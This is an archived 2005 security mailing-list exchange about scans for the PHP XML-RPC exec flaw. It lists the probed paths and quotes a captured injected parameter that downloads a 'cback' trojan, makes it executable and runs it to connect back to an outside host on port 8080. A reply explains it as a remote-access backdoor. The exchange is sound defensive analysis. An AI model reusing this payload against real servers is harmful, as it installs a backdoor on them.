[Dshield] Someone is scanning for PHP XML RPC vulnerability

Tom dshield at oitc.com
Tue Oct 11 13:09:53 GMT 2005


At 9:31 AM +0200 10/11/05, Stephane Grobety wrote:
>Apparently, someone is actively scanning for the PHP XMLRPC flaw. All
>my web servers and three completely separate networks have been probed.
>
>All the probes came from the same source IP:  216.33.212.32.
>
>The following locations are probed:
>
>//xmlrpc.php
>/xmlrpc.php
>/xmlrpc/xmlrpc.php
>/xmlsrv/xmlrpc.php
>/services/xmlrpc.php
>/blog/xmlrpc.php
>/drupal/xmlrpc.php
>/community/xmlrpc.php
>/blogs/xmlrpc.php
>/blogs/xmlsrv/xmlrpc.php
>/blog/xmlsrv/xmlrpc.php
>/blogtest/xmlsrv/xmlrpc.php
>/b2/xmlsrv/xmlrpc.php
>/b2evo/xmlsrv/xmlrpc.php
>/wordpress/xmlrpc.php
>
>Unfortunately, I don't quite understand the command it gives to the
>script, I think it's trying to connect back to 216.55.159.52 on 8080
>and the presence of chmod, in seems to indicates that it targets unix
>systems.
>
>The relevant parameter is:
>
>php-script='.60.255.44/cback;chmod_+x_cback;./cback_216.55.159.52_8080`;echo_'_end_';exit;/*
>
>Does someone understand this script ?

Exploit was documented back in the summer and if users patched they 
should be OK. As stated in 
http://forum.hardened-php.net/viewtopic.php?id=9 its a exec() 
exploit, What the above looks like is a piece of broken? code.  The 
".60.255.44/cback" would appear to be broken. it probably was 
curl/get from some IP the code/script called cback which is made 
executable and executed with parameters of 216.55.159.52 8080.  cback 
appears to be the remote access trojan, BackDoor-CTM 
(http://vil.nai.com/vil/content/v_134857.htm).

Tom


More information about the list mailing list